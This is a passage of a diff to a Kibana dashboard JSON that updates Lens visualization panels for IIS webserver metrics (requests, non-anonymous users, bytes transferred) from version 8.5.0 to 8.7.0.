"61df5fc7-b10c-4aba-9ef7-4f40a34d9419", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "60bf28a7-9653-4be5-b5d3-9440ac2fb976", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" + } + ] + }, + { + "accessors": [ + "15e96662-9271-4462-9248-089a5b1f6049" + ], + "layerId": "8238eaa5-3c3c-46e9-9a09-abee137c1fbf", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + 
"seriesType": "line", + "xAccessor": "71364c0c-46e6-47c9-8ebf-7badce75f44e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "15e96662-9271-4462-9248-089a5b1f6049" + } + ] + }, + { + "accessors": [ + "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" + ], + "layerId": "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "bd0259dd-9745-4775-959f-b23323d92557", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(149,0,188,1)", + "forAccessor": "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 12, - "i": "89279953-dda3-4340-b049-bb52c2cbbeb8", - "w": 38, - "x": 10, - "y": 9 + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "89279953-dda3-4340-b049-bb52c2cbbeb8", - "title": "Total Requests", - "type": "lens", - "version": "8.5.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "cfcc9b57-93b7-4830-9c93-82a29dc4aeee": { - "columnOrder": [ - "42783e77-7593-4488-bf9a-552f283b7e09", - "4047663d-033d-43bf-bacf-d051cc00fedc", - "4047663d-033d-43bf-bacf-d051cc00fedcX0", - "4047663d-033d-43bf-bacf-d051cc00fedcX1" - ], - "columns": { - "4047663d-033d-43bf-bacf-d051cc00fedc": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - 
"operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "4047663d-033d-43bf-bacf-d051cc00fedcX1" - ], - "scale": "ratio" - }, - "4047663d-033d-43bf-bacf-d051cc00fedcX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_non_anonymous_users" - }, - "4047663d-033d-43bf-bacf-d051cc00fedcX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "operationType": "overall_max", - "references": [ - "4047663d-033d-43bf-bacf-d051cc00fedcX0" - ], - "scale": "ratio" - }, - "42783e77-7593-4488-bf9a-552f283b7e09": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Current Non Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_non_anonymous_users" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#AB15D3", - "layerId": "cfcc9b57-93b7-4830-9c93-82a29dc4aeee", - "layerType": "data", - "maxAccessor": "4047663d-033d-43bf-bacf-d051cc00fedc", - "metricAccessor": "42783e77-7593-4488-bf9a-552f283b7e09", - "progressDirection": "horizontal" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + 
"enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "bb345920-7514-400f-a69e-be2625824248", + "w": 5, + "x": 0, + "y": 13 + }, + "panelIndex": "bb345920-7514-400f-a69e-be2625824248", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "cfcc9b57-93b7-4830-9c93-82a29dc4aeee": { + "columnOrder": [ + "42783e77-7593-4488-bf9a-552f283b7e09", + "4047663d-033d-43bf-bacf-d051cc00fedc", + "4047663d-033d-43bf-bacf-d051cc00fedcX0", + "4047663d-033d-43bf-bacf-d051cc00fedcX1" + ], + "columns": { + "4047663d-033d-43bf-bacf-d051cc00fedc": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "4047663d-033d-43bf-bacf-d051cc00fedcX1" + ], + "scale": "ratio" + }, + "4047663d-033d-43bf-bacf-d051cc00fedcX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_non_anonymous_users" + }, + "4047663d-033d-43bf-bacf-d051cc00fedcX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "operationType": 
"overall_max", + "references": [ + "4047663d-033d-43bf-bacf-d051cc00fedcX0" + ], + "scale": "ratio" + }, + "42783e77-7593-4488-bf9a-552f283b7e09": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Current Non Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_non_anonymous_users" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#AB15D3", + "layerId": "cfcc9b57-93b7-4830-9c93-82a29dc4aeee", + "layerType": "data", + "maxAccessor": "4047663d-033d-43bf-bacf-d051cc00fedc", + "metricAccessor": "42783e77-7593-4488-bf9a-552f283b7e09", + "progressDirection": "horizontal" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Non Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", + "w": 5, + "x": 5, + "y": 13 + }, + "panelIndex": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c8eba081-fa85-43a3-adee-81a6c126dd30": { + "columnOrder": [ + "18a755c6-6629-48e2-a173-4401811e0776", + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0", + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" + ], + "columns": { + "18a755c6-6629-48e2-a173-4401811e0776": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + 
"query": "iis.webserver.network.total_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Total Non Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_non_anonymous_users" + }, + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" + ], + "scale": "ratio" + }, + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_non_anonymous_users" + }, + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "operationType": "overall_max", + "references": [ + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D31569", + "layerId": "c8eba081-fa85-43a3-adee-81a6c126dd30", + "layerType": "data", + "maxAccessor": "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", + "metricAccessor": "18a755c6-6629-48e2-a173-4401811e0776", + "progressDirection": "horizontal" + } + }, + "title": "", + "type": "lens", + 
"visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Non Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "6df3b202-cc19-43fe-8832-499d8e22ac22", + "w": 24, + "x": 0, + "y": 21 + }, + "panelIndex": "6df3b202-cc19-43fe-8832-499d8e22ac22", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8648361e-3dcc-4fc2-85cf-95c3e2f153fe": { + "columnOrder": [ + "6eb9be4b-a63d-492a-aec8-35a850ee0cee", + "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" + ], + "columns": { + "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Received/sec", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.bytes_received_per_sec" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "6eb9be4b-a63d-492a-aec8-35a850ee0cee": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": true + "bb78d828-0dd4-449f-afac-291527b423a0": { + "columnOrder": [ + "cf1359a7-2549-4939-889b-4f994f49500b", + "d8d922c5-f21f-46e0-945b-409d12e16e34" + ], + "columns": { + 
"cf1359a7-2549-4939-889b-4f994f49500b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d8d922c5-f21f-46e0-945b-409d12e16e34": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Bytes Sent/sec", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.bytes_sent_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "bb345920-7514-400f-a69e-be2625824248", - "w": 5, - "x": 0, - "y": 13 + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "bb345920-7514-400f-a69e-be2625824248", - "title": "Current Non Anonymous Users", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c8eba081-fa85-43a3-adee-81a6c126dd30": { - "columnOrder": [ - "18a755c6-6629-48e2-a173-4401811e0776", - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0", - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" - ], - "columns": { - "18a755c6-6629-48e2-a173-4401811e0776": { - "customLabel": true, - "dataType": "number", - 
"filter": { - "language": "kuery", - "query": "iis.webserver.network.total_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Total Non Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_non_anonymous_users" - }, - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" - ], - "scale": "ratio" - }, - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_non_anonymous_users" - }, - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "operationType": "overall_max", - "references": [ - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D31569", - "layerId": "c8eba081-fa85-43a3-adee-81a6c126dd30", - "layerType": "data", - "maxAccessor": "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", - "metricAccessor": "18a755c6-6629-48e2-a173-4401811e0776", - "progressDirection": "horizontal" - } - }, - 
"title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "d8d922c5-f21f-46e0-945b-409d12e16e34" + ], + "layerId": "bb78d828-0dd4-449f-afac-291527b423a0", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "cf1359a7-2549-4939-889b-4f994f49500b", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(22,165,165,1)", + "forAccessor": "d8d922c5-f21f-46e0-945b-409d12e16e34" + } + ] + }, + { + "accessors": [ + "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" + ], + "layerId": "8648361e-3dcc-4fc2-85cf-95c3e2f153fe", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": true + "seriesType": "line", + "xAccessor": "6eb9be4b-a63d-492a-aec8-35a850ee0cee", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(250,40,255,1)", + "forAccessor": "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 8, - "i": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", - "w": 5, - "x": 5, - "y": 13 + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", - "title": "Total Non Anonymous Users", - "type": "lens", - "version": "8.5.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "8648361e-3dcc-4fc2-85cf-95c3e2f153fe": { - "columnOrder": [ - "6eb9be4b-a63d-492a-aec8-35a850ee0cee", - "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" - ], - "columns": { - "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Received/sec", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.bytes_received_per_sec" - }, - "6eb9be4b-a63d-492a-aec8-35a850ee0cee": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "bb78d828-0dd4-449f-afac-291527b423a0": { - "columnOrder": [ - "cf1359a7-2549-4939-889b-4f994f49500b", - "d8d922c5-f21f-46e0-945b-409d12e16e34" - ], - "columns": { - "cf1359a7-2549-4939-889b-4f994f49500b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d8d922c5-f21f-46e0-945b-409d12e16e34": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Bytes Sent/sec", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.bytes_sent_per_sec" 
- } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "d8d922c5-f21f-46e0-945b-409d12e16e34" - ], - "layerId": "bb78d828-0dd4-449f-afac-291527b423a0", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "cf1359a7-2549-4939-889b-4f994f49500b", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(22,165,165,1)", - "forAccessor": "d8d922c5-f21f-46e0-945b-409d12e16e34" - } - ] - }, - { - "accessors": [ - "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" - ], - "layerId": "8648361e-3dcc-4fc2-85cf-95c3e2f153fe", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "6eb9be4b-a63d-492a-aec8-35a850ee0cee", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(250,40,255,1)", - "forAccessor": "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Bytes Transferred/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 14, + 
"i": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", + "w": 24, + "x": 24, + "y": 21 + }, + "panelIndex": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "52e451a1-4048-4d1c-816d-2182732b5422": { + "columnOrder": [ + "fabe5744-0cb2-4e51-99da-57d8b3f921e6", + "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" + ], + "columns": { + "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Total Bytes Sent ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_bytes_sent" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "fabe5744-0cb2-4e51-99da-57d8b3f921e6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": false + "5c6856ee-1070-44d9-b0df-f7505dfe9a66": { + "columnOrder": [ + "3250ccbb-fb22-4235-93cd-9e8929be30da", + "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" + ], + "columns": { + "3250ccbb-fb22-4235-93cd-9e8929be30da": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" 
+ }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Bytes Received", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_bytes_received" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "6df3b202-cc19-43fe-8832-499d8e22ac22", - "w": 24, - "x": 0, - "y": 21 + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "6df3b202-cc19-43fe-8832-499d8e22ac22", - "title": "Bytes Transferred/sec", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "52e451a1-4048-4d1c-816d-2182732b5422": { - "columnOrder": [ - "fabe5744-0cb2-4e51-99da-57d8b3f921e6", - "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" - ], - "columns": { - "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Total Bytes Sent ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - 
} - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_bytes_sent" - }, - "fabe5744-0cb2-4e51-99da-57d8b3f921e6": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "5c6856ee-1070-44d9-b0df-f7505dfe9a66": { - "columnOrder": [ - "3250ccbb-fb22-4235-93cd-9e8929be30da", - "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" - ], - "columns": { - "3250ccbb-fb22-4235-93cd-9e8929be30da": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Bytes Received", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_bytes_received" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" - ], - "layerId": "52e451a1-4048-4d1c-816d-2182732b5422", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": 
"fabe5744-0cb2-4e51-99da-57d8b3f921e6", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(251,158,0,1)", - "forAccessor": "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" - } - ] - }, - { - "accessors": [ - "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" - ], - "layerId": "5c6856ee-1070-44d9-b0df-f7505dfe9a66", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "3250ccbb-fb22-4235-93cd-9e8929be30da", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + 